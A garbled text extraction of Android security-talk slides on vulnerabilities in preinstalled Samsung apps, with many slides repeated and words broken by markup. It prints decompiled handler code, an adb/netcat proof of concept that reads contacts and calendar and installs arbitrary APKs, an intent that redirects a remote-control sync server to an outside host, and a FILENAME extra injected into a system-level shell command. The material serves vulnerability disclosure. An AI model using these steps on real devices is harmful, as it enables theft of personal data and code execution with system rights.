8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 protected void work()<br />
2 {<br />
3 if(this.socket != 0)<br />
4 {<br />
5 socketIS = this.socket.getInputStream();<br />
6 socketOS = this.socket.getOutputStream();<br />
7 cmdL<strong>in</strong>e = this.readL<strong>in</strong>e(socketIS);<br />
8 if((cmdL<strong>in</strong>e != 0) && (cmdL<strong>in</strong>e.length() != 0))<br />
9 {<br />
10 cmdInformation = new Str<strong>in</strong>g[3];<br />
11 v5 = cmdL<strong>in</strong>e.<strong>in</strong>dexOf("BEGIN");<br />
12 cmdInformation[0] = cmdL<strong>in</strong>e.substr<strong>in</strong>g(0, 3);<br />
13 if(v5
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 70:<br />
2 v1 = this.GetContact(cmdInformation[1]);<br />
3 v2 = 0;<br />
4 break;<br />
5 [...]<br />
6 case 72:<br />
7 v1 = this.GetContactsIndexArray(<br />
8 com.wssnps.database.smlContactItem$StorageType.<br />
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());<br />
9 v2 = 0;<br />
10 break;<br />
11 [...]<br />
12 case 90:<br />
13 v1 = this.GetCalendar(cmdInformation[1]);<br />
14 v2 = 0;<br />
15 break;<br />
16 [...]
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 70:<br />
2 v1 = this.GetContact(cmdInformation[1]);<br />
3 v2 = 0;<br />
4 break;<br />
5 [...]<br />
6 case 72:<br />
7 v1 = this.GetContactsIndexArray(<br />
8 com.wssnps.database.smlContactItem$StorageType.<br />
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());<br />
9 v2 = 0;<br />
10 break;<br />
11 [...]<br />
12 case 90:<br />
13 v1 = this.GetCalendar(cmdInformation[1]);<br />
14 v2 = 0;<br />
15 break;<br />
16 [...]
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 70:<br />
2 v1 = this.GetContact(cmdInformation[1]);<br />
3 v2 = 0;<br />
4 break;<br />
5 [...]<br />
6 case 72:<br />
7 v1 = this.GetContactsIndexArray(<br />
8 com.wssnps.database.smlContactItem$StorageType.<br />
SMLDS_PIM_ADAPTER_CONTACT_PHONE.getId());<br />
9 v2 = 0;<br />
10 break;<br />
11 [...]<br />
12 case 90:<br />
13 v1 = this.GetCalendar(cmdInformation[1]);<br />
14 v2 = 0;<br />
15 break;<br />
16 [...]
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 453:<br />
2 v1 = Integer.valueOf(cmdInformation[1].trim()).<strong>in</strong>tValue();<br />
3 if(v1
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 453:<br />
2 v1 = Integer.valueOf(cmdInformation[1].trim()).<strong>in</strong>tValue();<br />
3 if(v1
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
smlNpsH<strong>and</strong>ler.work()<br />
1 case 453:<br />
2 v1 = Integer.valueOf(cmdInformation[1].trim()).<strong>in</strong>tValue();<br />
3 if(v1
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
PoC<br />
$ adb shell am broadcast -a com.<strong>in</strong>tent.action.KIES_WSSERVICE_START<br />
Broadcast<strong>in</strong>g: Intent { act=com.<strong>in</strong>tent.action.KIES_WSSERVICE_START }<br />
Broadcast completed: result=0<br />
$ adb shell netstat |grep 1108<br />
tcp6 0 0 :::1108 :::* LISTEN<br />
$ adb forward tcp:1108 tcp:1108<br />
$ nc localhost 1108 -v<br />
Connection to localhost 1108 port [tcp/*] succeeded!<br />
090 1 # getCalendar(1)<br />
0<br />
BEGIN:VCALENDAR<br />
VERSION:1.0<br />
BEGIN:VEVENT<br />
SUMMARY;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Sstic 2013<br />
DESCRIPTION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Conf<br />
LOCATION;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Rennes<br />
DTSTART:20130605T170000Z<br />
DTEND:20130607T180000Z<br />
X-ALLDAY:UNSET<br />
X-CALENDARGROUP:1<br />
UID:000000000000000000000000000000000000000000000001<br />
END:VEVENT<br />
END:VCALENDAR
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
PoC<br />
072 # get the id of contacts on the smartphone (not the SIM)<br />
0<br />
2 # number of contact<br />
8,9, # id of the contacts<br />
070 9 # getContact(9)<br />
0<br />
BEGIN:VCARD<br />
VERSION:2.1<br />
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Kev<strong>in</strong>;;;;;;;<br />
TEL;HOME;CELL:06 06 06 06 06<br />
EMAIL;HOME;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:kev<strong>in</strong>@hotmail.com<br />
X-DIRTY:1<br />
X-ACCOUNT:vnd.sec.contact.phone;vnd.sec.contact.phone<br />
END:VCARD<br />
453 32 # <strong>in</strong>stall APK from /sdcard/restore/<br />
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<br />
Some available features...<br />
C.R.U.D on the SMS/MMS/contacts/memos/calendar/call log/...<br />
Backup of mail accounts<br />
Installation of arbitrary application
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Vuln3 - wssyncmlnps.apk<br />
How it was patched?<br />
Permission added on the component for the action<br />
KIES_WSSERVICE_START<br />
<strong>and</strong>roid.permission.COM_WSSNPS has a protectionLevel of<br />
signatureOrSystem
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Gett<strong>in</strong>g C.R.U.D rights on SMS/Contacts/Memo <strong>and</strong> more<br />
Objectives
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Sync for fun <strong>and</strong> profit<br />
Vuln4 - Sync <strong>and</strong> remote control <strong>applications</strong>...<br />
FmmDM, FmmDS, ...<br />
There are <strong>applications</strong> to do data sync <strong>and</strong> remote control of the<br />
smartphone<br />
”Security” => ”Remote controls”<br />
The user can remote control his phone via http://samsungdive.com/
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Sync for fun <strong>and</strong> profit<br />
Vuln4 - sync <strong>and</strong> remote control <strong>applications</strong>...<br />
Vulnerabilities<br />
These <strong>applications</strong> export a BroadcastReceiver<br />
With the correct Intent, you can change the default server used for<br />
sync <strong>and</strong> remote control by the smartphone<br />
Poc for FmmDM<br />
shell@<strong>and</strong>roid:/ $ am broadcast -a <strong>and</strong>roid.<strong>in</strong>tent.action.dsm.UPDATE_URL<br />
--es DMServer "http://sh4ka.fr:80/test/trololo.php"
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Sync for fun <strong>and</strong> profit<br />
Vuln4 - sync <strong>and</strong> remote control <strong>applications</strong>...
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
Sync for fun <strong>and</strong> profit<br />
Vuln4 - sync <strong>and</strong> remote control <strong>applications</strong>...
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
ASADatabase to the rescue<br />
Search <strong>in</strong> the database for <strong>applications</strong> with:<br />
sharedUserId = system<br />
Usage of API for comm<strong>and</strong> execution/dynamic code load<strong>in</strong>g<br />
Among these <strong>applications</strong>: serviceModeApp.apk<br />
A strange <strong>Android</strong>Manifest.xml file<br />
1 <br />
2 <br />
3 <br />
4 <br />
5 <br />
6 <br />
8 <br />
9 <br />
10 <br />
11
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
ASADatabase to the rescue<br />
Search <strong>in</strong> the database for <strong>applications</strong> with:<br />
sharedUserId = system<br />
Usage of API for comm<strong>and</strong> execution/dynamic code load<strong>in</strong>g<br />
Among these <strong>applications</strong>: serviceModeApp.apk<br />
A strange <strong>Android</strong>Manifest.xml file<br />
1 <br />
2 <br />
3 <br />
4 <br />
5 <br />
6 <br />
8 <br />
9 <br />
10 <br />
11
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
ASADatabase to the rescue<br />
Search <strong>in</strong> the database for <strong>applications</strong> with:<br />
sharedUserId = system<br />
Usage of API for comm<strong>and</strong> execution/dynamic code load<strong>in</strong>g<br />
Among these <strong>applications</strong>: serviceModeApp.apk<br />
A strange <strong>Android</strong>Manifest.xml file<br />
1 <br />
2 <br />
3 <br />
4 <br />
5 <br />
6 <br />
8 <br />
9 <br />
10 <br />
11
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
ASADatabase to the rescue<br />
Search <strong>in</strong> the database for <strong>applications</strong> with:<br />
sharedUserId = system<br />
Usage of API for comm<strong>and</strong> execution/dynamic code load<strong>in</strong>g<br />
Among these <strong>applications</strong>: serviceModeApp.apk<br />
A strange <strong>Android</strong>Manifest.xml file<br />
1 <br />
2 <br />
3 <br />
4 <br />
5 <br />
6 <br />
8 <br />
9 <br />
10 <br />
11
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpReceiver.onReceive()<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 Str<strong>in</strong>g str1 = paramIntent.getAction();<br />
4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);<br />
5 if (str1.equals("com.<strong>and</strong>roid.sec.FTAT_DUMP"))<br />
6 {<br />
7 Str<strong>in</strong>g str3 = "FTAT_" + paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
8 Calendar localCalendar = Calendar.getInstance();<br />
9 Str<strong>in</strong>g str4 = str3 + new DecimalFormat("0000").format(localCalendar.get<br />
(1));<br />
10 [...]<br />
11 Str<strong>in</strong>g str9 = str8 + new DecimalFormat("00").format(localCalendar.get<br />
(13));<br />
12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);<br />
13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);<br />
14 localIntent2.setFlags(268435456);<br />
15 localIntent2.putExtra("FILENAME", str9);<br />
16 paramContext.startService(localIntent2);<br />
17 }<br />
18 [...]<br />
19 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpReceiver.onReceive()<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 Str<strong>in</strong>g str1 = paramIntent.getAction();<br />
4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);<br />
5 if (str1.equals("com.<strong>and</strong>roid.sec.FTAT_DUMP"))<br />
6 {<br />
7 Str<strong>in</strong>g str3 = "FTAT_" + paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
8 Calendar localCalendar = Calendar.getInstance();<br />
9 Str<strong>in</strong>g str4 = str3 + new DecimalFormat("0000").format(localCalendar.get<br />
(1));<br />
10 [...]<br />
11 Str<strong>in</strong>g str9 = str8 + new DecimalFormat("00").format(localCalendar.get<br />
(13));<br />
12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);<br />
13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);<br />
14 localIntent2.setFlags(268435456);<br />
15 localIntent2.putExtra("FILENAME", str9);<br />
16 paramContext.startService(localIntent2);<br />
17 }<br />
18 [...]<br />
19 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpReceiver.onReceive()<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 Str<strong>in</strong>g str1 = paramIntent.getAction();<br />
4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);<br />
5 if (str1.equals("com.<strong>and</strong>roid.sec.FTAT_DUMP"))<br />
6 {<br />
7 Str<strong>in</strong>g str3 = "FTAT_" + paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
8 Calendar localCalendar = Calendar.getInstance();<br />
9 Str<strong>in</strong>g str4 = str3 + new DecimalFormat("0000").format(localCalendar.get<br />
(1));<br />
10 [...]<br />
11 Str<strong>in</strong>g str9 = str8 + new DecimalFormat("00").format(localCalendar.get<br />
(13));<br />
12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);<br />
13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);<br />
14 localIntent2.setFlags(268435456);<br />
15 localIntent2.putExtra("FILENAME", str9);<br />
16 paramContext.startService(localIntent2);<br />
17 }<br />
18 [...]<br />
19 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpReceiver.onReceive()<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 Str<strong>in</strong>g str1 = paramIntent.getAction();<br />
4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);<br />
5 if (str1.equals("com.<strong>and</strong>roid.sec.FTAT_DUMP"))<br />
6 {<br />
7 Str<strong>in</strong>g str3 = "FTAT_" + paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
8 Calendar localCalendar = Calendar.getInstance();<br />
9 Str<strong>in</strong>g str4 = str3 + new DecimalFormat("0000").format(localCalendar.get<br />
(1));<br />
10 [...]<br />
11 Str<strong>in</strong>g str9 = str8 + new DecimalFormat("00").format(localCalendar.get<br />
(13));<br />
12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);<br />
13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);<br />
14 localIntent2.setFlags(268435456);<br />
15 localIntent2.putExtra("FILENAME", str9);<br />
16 paramContext.startService(localIntent2);<br />
17 }<br />
18 [...]<br />
19 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpReceiver.onReceive()<br />
1 public void onReceive(Context paramContext, Intent paramIntent)<br />
2 {<br />
3 Str<strong>in</strong>g str1 = paramIntent.getAction();<br />
4 Log.i("FTATDumpReceiver", "onReceive␣action=" + str1);<br />
5 if (str1.equals("com.<strong>and</strong>roid.sec.FTAT_DUMP"))<br />
6 {<br />
7 Str<strong>in</strong>g str3 = "FTAT_" + paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
8 Calendar localCalendar = Calendar.getInstance();<br />
9 Str<strong>in</strong>g str4 = str3 + new DecimalFormat("0000").format(localCalendar.get<br />
(1));<br />
10 [...]<br />
11 Str<strong>in</strong>g str9 = str8 + new DecimalFormat("00").format(localCalendar.get<br />
(13));<br />
12 Log.i("FTATDumpReceiver", "Dump␣Filename␣is" + str9);<br />
13 Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);<br />
14 localIntent2.setFlags(268435456);<br />
15 localIntent2.putExtra("FILENAME", str9);<br />
16 paramContext.startService(localIntent2);<br />
17 }<br />
18 [...]<br />
19 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.onStartComm<strong>and</strong>()<br />
1 public <strong>in</strong>t onStartComm<strong>and</strong>(Intent paramIntent, <strong>in</strong>t paramInt1, <strong>in</strong>t paramInt2)<br />
2 {<br />
3 Log.i("FTATDumpService", "onStartComm<strong>and</strong>()");<br />
4 this.mH<strong>and</strong>ler.sendEmptyMessage(1005);<br />
5 f<strong>in</strong>al Str<strong>in</strong>g str = paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
6 [...]<br />
7 new Thread(new Runnable()<br />
8 {<br />
9 public void run()<br />
10 {<br />
11 FTATDumpService.this.sendMessage(<br />
12 FTATDumpService.access$600(FTATDumpService.this),<br />
13 FTATDumpService.this.mH<strong>and</strong>ler.obta<strong>in</strong>Message(1014)<br />
14 );<br />
15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "<br />
.log"))<br />
16 FTATDumpService.this.mH<strong>and</strong>ler.sendEmptyMessage(1015);<br />
17 [...]<br />
18 }<br />
19 }).start();<br />
20 return 0;<br />
21 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.onStartComm<strong>and</strong>()<br />
1 public <strong>in</strong>t onStartComm<strong>and</strong>(Intent paramIntent, <strong>in</strong>t paramInt1, <strong>in</strong>t paramInt2)<br />
2 {<br />
3 Log.i("FTATDumpService", "onStartComm<strong>and</strong>()");<br />
4 this.mH<strong>and</strong>ler.sendEmptyMessage(1005);<br />
5 f<strong>in</strong>al Str<strong>in</strong>g str = paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
6 [...]<br />
7 new Thread(new Runnable()<br />
8 {<br />
9 public void run()<br />
10 {<br />
11 FTATDumpService.this.sendMessage(<br />
12 FTATDumpService.access$600(FTATDumpService.this),<br />
13 FTATDumpService.this.mH<strong>and</strong>ler.obta<strong>in</strong>Message(1014)<br />
14 );<br />
15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "<br />
.log"))<br />
16 FTATDumpService.this.mH<strong>and</strong>ler.sendEmptyMessage(1015);<br />
17 [...]<br />
18 }<br />
19 }).start();<br />
20 return 0;<br />
21 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.onStartComm<strong>and</strong>()<br />
1 public <strong>in</strong>t onStartComm<strong>and</strong>(Intent paramIntent, <strong>in</strong>t paramInt1, <strong>in</strong>t paramInt2)<br />
2 {<br />
3 Log.i("FTATDumpService", "onStartComm<strong>and</strong>()");<br />
4 this.mH<strong>and</strong>ler.sendEmptyMessage(1005);<br />
5 f<strong>in</strong>al Str<strong>in</strong>g str = paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
6 [...]<br />
7 new Thread(new Runnable()<br />
8 {<br />
9 public void run()<br />
10 {<br />
11 FTATDumpService.this.sendMessage(<br />
12 FTATDumpService.access$600(FTATDumpService.this),<br />
13 FTATDumpService.this.mH<strong>and</strong>ler.obta<strong>in</strong>Message(1014)<br />
14 );<br />
15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "<br />
.log"))<br />
16 FTATDumpService.this.mH<strong>and</strong>ler.sendEmptyMessage(1015);<br />
17 [...]<br />
18 }<br />
19 }).start();<br />
20 return 0;<br />
21 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.onStartComm<strong>and</strong>()<br />
1 public <strong>in</strong>t onStartComm<strong>and</strong>(Intent paramIntent, <strong>in</strong>t paramInt1, <strong>in</strong>t paramInt2)<br />
2 {<br />
3 Log.i("FTATDumpService", "onStartComm<strong>and</strong>()");<br />
4 this.mH<strong>and</strong>ler.sendEmptyMessage(1005);<br />
5 f<strong>in</strong>al Str<strong>in</strong>g str = paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
6 [...]<br />
7 new Thread(new Runnable()<br />
8 {<br />
9 public void run()<br />
10 {<br />
11 FTATDumpService.this.sendMessage(<br />
12 FTATDumpService.access$600(FTATDumpService.this),<br />
13 FTATDumpService.this.mH<strong>and</strong>ler.obta<strong>in</strong>Message(1014)<br />
14 );<br />
15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "<br />
.log"))<br />
16 FTATDumpService.this.mH<strong>and</strong>ler.sendEmptyMessage(1015);<br />
17 [...]<br />
18 }<br />
19 }).start();<br />
20 return 0;<br />
21 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.onStartComm<strong>and</strong>()<br />
1 public <strong>in</strong>t onStartComm<strong>and</strong>(Intent paramIntent, <strong>in</strong>t paramInt1, <strong>in</strong>t paramInt2)<br />
2 {<br />
3 Log.i("FTATDumpService", "onStartComm<strong>and</strong>()");<br />
4 this.mH<strong>and</strong>ler.sendEmptyMessage(1005);<br />
5 f<strong>in</strong>al Str<strong>in</strong>g str = paramIntent.getStr<strong>in</strong>gExtra("FILENAME");<br />
6 [...]<br />
7 new Thread(new Runnable()<br />
8 {<br />
9 public void run()<br />
10 {<br />
11 FTATDumpService.this.sendMessage(<br />
12 FTATDumpService.access$600(FTATDumpService.this),<br />
13 FTATDumpService.this.mH<strong>and</strong>ler.obta<strong>in</strong>Message(1014)<br />
14 );<br />
15 if (FTATDumpService.this.DoShellCmd("dumpstate␣>␣/data/log/" + str + "<br />
.log"))<br />
16 FTATDumpService.this.mH<strong>and</strong>ler.sendEmptyMessage(1015);<br />
17 [...]<br />
18 }<br />
19 }).start();<br />
20 return 0;<br />
21 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.doShellCmd()<br />
1 private boolean DoShellCmd(Str<strong>in</strong>g paramStr<strong>in</strong>g)<br />
2 {<br />
3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramStr<strong>in</strong>g);<br />
4 Str<strong>in</strong>g[] arrayOfStr<strong>in</strong>g = new Str<strong>in</strong>g[3];<br />
5 arrayOfStr<strong>in</strong>g[0] = "/system/b<strong>in</strong>/sh";<br />
6 arrayOfStr<strong>in</strong>g[1] = "-c";<br />
7 arrayOfStr<strong>in</strong>g[2] = paramStr<strong>in</strong>g;<br />
8 Log.i("FTATDumpService", "exec␣comm<strong>and</strong>");<br />
9 Runtime.getRuntime().exec(arrayOfStr<strong>in</strong>g).waitFor();<br />
10 Log.i("FTATDumpService", "exec␣done");<br />
11 Log.i("FTATDumpService", "DoShellCmd␣done");<br />
12 return true;<br />
13 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.doShellCmd()<br />
1 private boolean DoShellCmd(Str<strong>in</strong>g paramStr<strong>in</strong>g)<br />
2 {<br />
3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramStr<strong>in</strong>g);<br />
4 Str<strong>in</strong>g[] arrayOfStr<strong>in</strong>g = new Str<strong>in</strong>g[3];<br />
5 arrayOfStr<strong>in</strong>g[0] = "/system/b<strong>in</strong>/sh";<br />
6 arrayOfStr<strong>in</strong>g[1] = "-c";<br />
7 arrayOfStr<strong>in</strong>g[2] = paramStr<strong>in</strong>g;<br />
8 Log.i("FTATDumpService", "exec␣comm<strong>and</strong>");<br />
9 Runtime.getRuntime().exec(arrayOfStr<strong>in</strong>g).waitFor();<br />
10 Log.i("FTATDumpService", "exec␣done");<br />
11 Log.i("FTATDumpService", "DoShellCmd␣done");<br />
12 return true;<br />
13 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.doShellCmd()<br />
1 private boolean DoShellCmd(Str<strong>in</strong>g paramStr<strong>in</strong>g)<br />
2 {<br />
3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramStr<strong>in</strong>g);<br />
4 Str<strong>in</strong>g[] arrayOfStr<strong>in</strong>g = new Str<strong>in</strong>g[3];<br />
5 arrayOfStr<strong>in</strong>g[0] = "/system/b<strong>in</strong>/sh";<br />
6 arrayOfStr<strong>in</strong>g[1] = "-c";<br />
7 arrayOfStr<strong>in</strong>g[2] = paramStr<strong>in</strong>g;<br />
8 Log.i("FTATDumpService", "exec␣comm<strong>and</strong>");<br />
9 Runtime.getRuntime().exec(arrayOfStr<strong>in</strong>g).waitFor();<br />
10 Log.i("FTATDumpService", "exec␣done");<br />
11 Log.i("FTATDumpService", "DoShellCmd␣done");<br />
12 return true;<br />
13 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Vuln5 - serviceModeApp.apk<br />
FTATDumpService.doShellCmd()<br />
1 private boolean DoShellCmd(Str<strong>in</strong>g paramStr<strong>in</strong>g)<br />
2 {<br />
3 Log.i("FTATDumpService", "DoShellCmd␣:␣" + paramStr<strong>in</strong>g);<br />
4 Str<strong>in</strong>g[] arrayOfStr<strong>in</strong>g = new Str<strong>in</strong>g[3];<br />
5 arrayOfStr<strong>in</strong>g[0] = "/system/b<strong>in</strong>/sh";<br />
6 arrayOfStr<strong>in</strong>g[1] = "-c";<br />
7 arrayOfStr<strong>in</strong>g[2] = paramStr<strong>in</strong>g;<br />
8 Log.i("FTATDumpService", "exec␣comm<strong>and</strong>");<br />
9 Runtime.getRuntime().exec(arrayOfStr<strong>in</strong>g).waitFor();<br />
10 Log.i("FTATDumpService", "exec␣done");<br />
11 Log.i("FTATDumpService", "DoShellCmd␣done");<br />
12 return true;<br />
13 }
<strong>Android</strong> <strong>in</strong>troduction <strong>Android</strong> <strong>security</strong> model Methodology Toward a backdoor without permission Post-exploitation<br />
I dont need root when i have system<br />
Srsly?
